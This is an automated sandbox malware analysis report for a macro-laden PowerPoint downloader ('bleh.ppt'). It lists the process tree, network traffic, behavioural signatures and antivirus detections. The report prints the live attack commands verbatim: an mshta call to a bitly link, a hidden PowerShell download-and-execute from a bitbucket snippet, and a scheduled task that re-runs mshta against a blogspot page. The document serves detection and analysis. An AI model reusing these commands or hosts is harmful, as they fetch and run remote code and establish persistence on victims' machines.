Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6403_us	Oct. 6, 2021, 2:35 p.m.	Oct. 6, 2021, 2:37 p.m.

Size	67.5KB
Type	Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Title: PVC PIPES, Subject: PVC PIPES, Author: Admin MPC, Keywords: PVC PIPES, Last Saved By: support , Revision Number: 21, Name of Creating Application: Microsoft Office PowerPoint, Total Editing Time: 28:08, Create Time/Date: Mon Oct 4 21:10:47 2021, Last Saved Time/Date: Mon Oct 4 21:38:56 2021, Number of Words: 0
MD5	`f0da0a10cdf0e66706034fd14f70b06f`
SHA256	`3c116943abd9fca5349dda0e4a09509f1785c807e33db100df7d44c9471623d7`
CRC32	`65446E0F`
ssdeep	`384:iKAc6fZFmiSbzN08+ZNqH4MdUYHChUiM6S+W3/clFo39D:16mvzWZNq0MlZ/cjo`
Yara	Contains_VBA_macro_code - Detect a MS Office document with embedded VBA macro code [binaries] Generic_Malware_Zero - Generic Malware Microsoft_Office_File_Zero - Microsoft Office File

POWERPNT.EXE "C:\Program Files (x86)\Microsoft Office\Office15\POWERPNT.EXE" /S C:\Users\test22\AppData\Local\Temp\bleh.ppt
2300
- mshta.exe mshta Http://bitly.com/qtyiwedhjkabdhsagbdhnsavbd
  3020
  - powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w h i'E'x(iwr('https://bitbucket.org/!api/2.0/snippets/choasknight/rXXMLK/e391fed7e0a4d6c76294d9bae0b4536b0bb072eb/files/og') -useB);
    2536
  - schtasks.exe "C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 80 /tn ""SECOTAKSA"" /F /tr ""\""MsHtA""\""https://madarbloghogya.blogspot.com/p/og.html""
    548

Name	Response	Post-Analysis Lookup
kyahogysammajhnailagrahiat1.blogspot.com	CNAME blogspot.l.googleusercontent.com A 142.250.66.129	172.217.24.129
resources.blogblog.com	A 172.217.31.233 CNAME blogger.l.google.com	216.58.197.201
www.blogger.com	A 142.250.66.105 CNAME blogger.l.google.com	216.58.197.201
bitly.com	A 67.199.248.15 A 67.199.248.14	67.199.248.15

IP Address	Status	Action
142.250.66.105	Active	Moloch
142.250.66.129	Active	Moloch
164.124.101.2	Active	Moloch
172.217.31.233	Active	Moloch
67.199.248.14	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.103:49174 -> 142.250.66.129:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49175 -> 142.250.66.105:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49181 -> 172.217.31.233:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49176 -> 142.250.66.105:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49177 -> 172.217.31.233:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined

Suricata TLS

Flow	Issuer	Subject	Fingerprint
TLSv1 192.168.56.103:49174 142.250.66.129:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1C3	CN=misc-sni.blogspot.com	fc:db:2e:5e:8f:df:23:25:9a:03:2f:a3:eb:58:73:23:f5:30:86:76
TLSv1 192.168.56.103:49175 142.250.66.105:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1C3	CN=*.blogger.com	76:d9:ed:9a:97:01:f9:eb:d2:fb:79:86:c4:64:4f:02:1a:32:16:3b
TLSv1 192.168.56.103:49181 172.217.31.233:443	None	None	None
TLSv1 192.168.56.103:49176 142.250.66.105:443	None	None	None
TLSv1 192.168.56.103:49177 172.217.31.233:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1C3	CN=*.blogger.com	76:d9:ed:9a:97:01:f9:eb:d2:fb:79:86:c4:64:4f:02:1a:32:16:3b

Queries for the computername (9 events)

Time & API	Arguments	Status	Return
GetComputerNameW Oct. 6, 2021, 2:36 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 6, 2021, 2:36 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 6, 2021, 2:36 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 6, 2021, 2:36 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 6, 2021, 2:36 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 6, 2021, 2:36 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 6, 2021, 2:36 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 6, 2021, 2:36 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 6, 2021, 2:36 p.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (1 event)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Oct. 6, 2021, 2:36 p.m.			0	0

Command line console output was observed (2 events)

Time & API	Arguments	Status	Return	Repeated
WriteConsoleW Oct. 6, 2021, 2:36 p.m.	buffer: Processing -WindowStyle 'h' failed: Cannot convert value "h" to type "System.Diagnostics.ProcessWindowStyle" due to invalid enumeration values. Specify one of the following enumeration values and try again. The possible enumeration values are "Normal, Hidden, Minimized, Maximized". console_handle: 0x0000001f	1	1	0
WriteConsoleW Oct. 6, 2021, 2:36 p.m.	buffer: SUCCESS: The scheduled task "SECOTAKSA" has successfully been created. console_handle: 0x00000007	1	1	0

Uses Windows APIs to generate a cryptographic key (15 events)

Time & API	Arguments	Status	Return
CryptExportKey Oct. 6, 2021, 2:36 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00569c60 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 6, 2021, 2:36 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0056a1e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 6, 2021, 2:36 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0056a1e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 6, 2021, 2:36 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0056a1e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 6, 2021, 2:36 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00569d60 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 6, 2021, 2:36 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00569d60 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 6, 2021, 2:36 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00569d60 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 6, 2021, 2:36 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00569d60 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 6, 2021, 2:36 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00569d60 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 6, 2021, 2:36 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00569d60 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 6, 2021, 2:36 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0056a1e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 6, 2021, 2:36 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0056a1e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 6, 2021, 2:36 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0056a1e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 6, 2021, 2:36 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0056a1e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 6, 2021, 2:36 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0056a1e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Oct. 6, 2021, 2:36 p.m.		1	1	0

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

Performs some HTTP requests (11 events)

request	GET http://bitly.com/qtyiwedhjkabdhsagbdhnsavbd
request	GET https://kyahogysammajhnailagrahiat1.blogspot.com/p/og1-1.html
request	GET https://www.blogger.com/static/v1/widgets/1667664774-css_bundle_v2.css
request	GET https://www.blogger.com/static/v1/jsbin/403901366-ieretrofit.js
request	GET https://www.blogger.com/dyn-css/authorization.css?targetBlogID=8965474558532949541&zx=c284ae92-b0d2-4f96-8852-ffc3b557f602
request	GET https://www.blogger.com/static/v1/jsbin/186635561-comment_from_post_iframe.js
request	GET https://www.blogger.com/static/v1/widgets/963277127-widgets.js
request	GET https://resources.blogblog.com/img/icon18_edit_allbkg.gif
request	GET https://resources.blogblog.com/blogblog/data/1kt/simple/body_gradient_tile_light.png
request	GET https://www.blogger.com/img/share_buttons_20_3.png
request	GET https://resources.blogblog.com/blogblog/data/1kt/simple/gradients_light.png

Allocates read-write-execute memory (usually to unpack itself) (50 out of 359 events)

Time & API	Arguments	Status
NtProtectVirtualMemory Oct. 6, 2021, 2:35 p.m.	process_identifier: 2300 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6a96e000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 6, 2021, 2:35 p.m.	process_identifier: 2300 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x036f4000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 6, 2021, 2:35 p.m.	process_identifier: 2300 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x036f4000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 6, 2021, 2:35 p.m.	process_identifier: 2300 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x036f4000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 6, 2021, 2:35 p.m.	process_identifier: 2300 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x036f4000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 6, 2021, 2:35 p.m.	process_identifier: 2300 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x036f4000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 6, 2021, 2:35 p.m.	process_identifier: 2300 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x036f4000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 6, 2021, 2:35 p.m.	process_identifier: 2300 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x036f4000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 6, 2021, 2:35 p.m.	process_identifier: 2300 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x036f4000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 6, 2021, 2:35 p.m.	process_identifier: 2300 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x036f4000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 6, 2021, 2:35 p.m.	process_identifier: 2300 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x036f4000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 6, 2021, 2:35 p.m.	process_identifier: 2300 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x036f4000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 6, 2021, 2:35 p.m.	process_identifier: 2300 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x036f4000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 6, 2021, 2:35 p.m.	process_identifier: 2300 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x036f4000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 6, 2021, 2:35 p.m.	process_identifier: 2300 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x036f4000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 6, 2021, 2:35 p.m.	process_identifier: 2300 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x036f4000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 6, 2021, 2:35 p.m.	process_identifier: 2300 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x036f4000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 6, 2021, 2:35 p.m.	process_identifier: 2300 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x036f4000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 6, 2021, 2:35 p.m.	process_identifier: 2300 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x036f4000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 6, 2021, 2:35 p.m.	process_identifier: 2300 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x036f4000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 6, 2021, 2:35 p.m.	process_identifier: 2300 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x036f4000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 6, 2021, 2:35 p.m.	process_identifier: 2300 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x036f4000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 6, 2021, 2:35 p.m.	process_identifier: 2300 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x036f4000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 6, 2021, 2:35 p.m.	process_identifier: 2300 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x036f4000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 6, 2021, 2:35 p.m.	process_identifier: 2300 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x036f4000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 6, 2021, 2:35 p.m.	process_identifier: 2300 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x036f4000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 6, 2021, 2:35 p.m.	process_identifier: 2300 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x036f4000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 6, 2021, 2:35 p.m.	process_identifier: 2300 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x036f4000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 6, 2021, 2:35 p.m.	process_identifier: 2300 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x036f4000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 6, 2021, 2:36 p.m.	process_identifier: 2300 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x036f4000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 6, 2021, 2:36 p.m.	process_identifier: 2300 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x036f4000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 6, 2021, 2:36 p.m.	process_identifier: 2300 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x036f4000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 6, 2021, 2:36 p.m.	process_identifier: 2300 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x036f4000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 6, 2021, 2:36 p.m.	process_identifier: 2300 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x036f4000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 6, 2021, 2:36 p.m.	process_identifier: 2300 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x036f4000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 6, 2021, 2:36 p.m.	process_identifier: 2300 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x036f4000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 6, 2021, 2:36 p.m.	process_identifier: 2300 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x036f4000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 6, 2021, 2:36 p.m.	process_identifier: 2300 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x036f4000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 6, 2021, 2:36 p.m.	process_identifier: 2300 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x036f4000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 6, 2021, 2:36 p.m.	process_identifier: 2300 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x036f4000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 6, 2021, 2:36 p.m.	process_identifier: 2300 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x036f4000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 6, 2021, 2:36 p.m.	process_identifier: 2300 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x036f4000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 6, 2021, 2:36 p.m.	process_identifier: 2300 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x036f4000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 6, 2021, 2:36 p.m.	process_identifier: 2300 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x036f4000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 6, 2021, 2:36 p.m.	process_identifier: 2300 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x036f4000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 6, 2021, 2:36 p.m.	process_identifier: 2300 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x036f4000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 6, 2021, 2:36 p.m.	process_identifier: 2300 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x036f4000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 6, 2021, 2:36 p.m.	process_identifier: 2300 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x036f4000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 6, 2021, 2:36 p.m.	process_identifier: 2300 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x036f4000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 6, 2021, 2:36 p.m.	process_identifier: 2300 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x036f4000 process_handle: 0xffffffff	1

Creates executable files on the filesystem (3 events)

file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VKMIWH9C\963277127-widgets[1].js
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\BYECVYBT\403901366-ieretrofit[1].js
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZTY94C7J\186635561-comment_from_post_iframe[1].js

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\Documents\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (5 events)

cmdline	"C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 80 /tn ""SECOTAKSA"" /F /tr ""\""MsHtA""\""https://madarbloghogya.blogspot.com/p/og.html""
cmdline	mshta Http://bitly.com/qtyiwedhjkabdhsagbdhnsavbd
cmdline	pOwersHelL.exe -w h i'E'x(iwr('https://bitbucket.org/!api/2.0/snippets/choasknight/rXXMLK/e391fed7e0a4d6c76294d9bae0b4536b0bb072eb/files/og') -useB);
cmdline	schtasks /create /sc MINUTE /mo 80 /tn ""SECOTAKSA"" /F /tr ""\""MsHtA""\""https://madarbloghogya.blogspot.com/p/og.html""
cmdline	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w h i'E'x(iwr('https://bitbucket.org/!api/2.0/snippets/choasknight/rXXMLK/e391fed7e0a4d6c76294d9bae0b4536b0bb072eb/files/og') -useB);

A process created a hidden window (2 events)

Time & API	Arguments	Status	Return	Repeated
ShellExecuteExW Oct. 6, 2021, 2:36 p.m.	show_type: 0 filepath_r: pOwersHelL.exe parameters: -w h i'E'x(iwr('https://bitbucket.org/!api/2.0/snippets/choasknight/rXXMLK/e391fed7e0a4d6c76294d9bae0b4536b0bb072eb/files/og') -useB); filepath: pOwersHelL.exe	1	1	0
ShellExecuteExW Oct. 6, 2021, 2:36 p.m.	show_type: 0 filepath_r: schtasks parameters: /create /sc MINUTE /mo 80 /tn ""SECOTAKSA"" /F /tr ""\""MsHtA""\""https://madarbloghogya.blogspot.com/p/og.html"" filepath: schtasks	1	1	0

Changes read-write memory protection to read-execute (probably to avoid detection when setting all RWX flags at the same time) (1 event)

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory Oct. 6, 2021, 2:35 p.m.	process_identifier: 2300 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 32 (PAGE_EXECUTE_READ) base_address: 0x7ef80000 process_handle: 0xffffffff	1	0	0

Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW Oct. 6, 2021, 2:36 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Yara rule detected in process memory (8 events)

description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep

Uses Windows utilities for basic Windows functionality (2 events)

cmdline	"C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 80 /tn ""SECOTAKSA"" /F /tr ""\""MsHtA""\""https://madarbloghogya.blogspot.com/p/og.html""
cmdline	schtasks /create /sc MINUTE /mo 80 /tn ""SECOTAKSA"" /F /tr ""\""MsHtA""\""https://madarbloghogya.blogspot.com/p/og.html""

Installs itself for autorun at Windows startup (2 events)

cmdline	"C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 80 /tn ""SECOTAKSA"" /F /tr ""\""MsHtA""\""https://madarbloghogya.blogspot.com/p/og.html""
cmdline	schtasks /create /sc MINUTE /mo 80 /tn ""SECOTAKSA"" /F /tr ""\""MsHtA""\""https://madarbloghogya.blogspot.com/p/og.html""

Disables proxy possibly for traffic interception (1 event)

Time & API	Arguments	Status	Return	Repeated
RegSetValueExA Oct. 6, 2021, 2:36 p.m.	key_handle: 0x000002dc regkey_r: ProxyEnable reg_type: 4 (REG_DWORD) value: 0 regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable	1	0	0

File has been identified by 19 AntiVirus engines on VirusTotal as malicious (19 events)

Lionic	Trojan.Script.Generic.a!c
ALYac	VB:Trojan.Valyria.4194
Sangfor	Malware.Generic-VBA.Save.Obfuscated
Arcabit	VB:Trojan.Valyria.D1062
Cyren	PP97M/Agent.TP.gen!Eldorado
Symantec	CL.Downloader!gen87
ESET-NOD32	a variant of VBA/TrojanDownloader.Agent.VVQ
TrendMicro-HouseCall	TROJ_FRS.VSNTJ521
Kaspersky	HEUR:Trojan-Downloader.Script.Generic
BitDefender	VB:Trojan.Valyria.4194
MicroWorld-eScan	VB:Trojan.Valyria.4194
Ad-Aware	VB:Trojan.Valyria.4194
Emsisoft	VB:Trojan.Valyria.4194 (B)
FireEye	VB:Trojan.Valyria.4194
Ikarus	Win32.Outbreak
MAX	malware (ai score=89)
GData	VB:Trojan.Valyria.4194
McAfee	RDN/Generic Downloader.x
Tencent	Win32.Trojan-downloader.Agent.Eddq

One or more non-whitelisted processes were created (1 event)

parent_process

powerpnt.exe

martian_process

mshta Http://bitly.com/qtyiwedhjkabdhsagbdhnsavbd

Resumed a suspended thread in a remote process potentially indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 3020 resumed a thread in remote process 548
NtResumeThread Oct. 6, 2021, 2:36 p.m.	thread_handle: 0x00000738 suspend_count: 1 process_identifier: 548	1	0	0

bleh.ppt

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All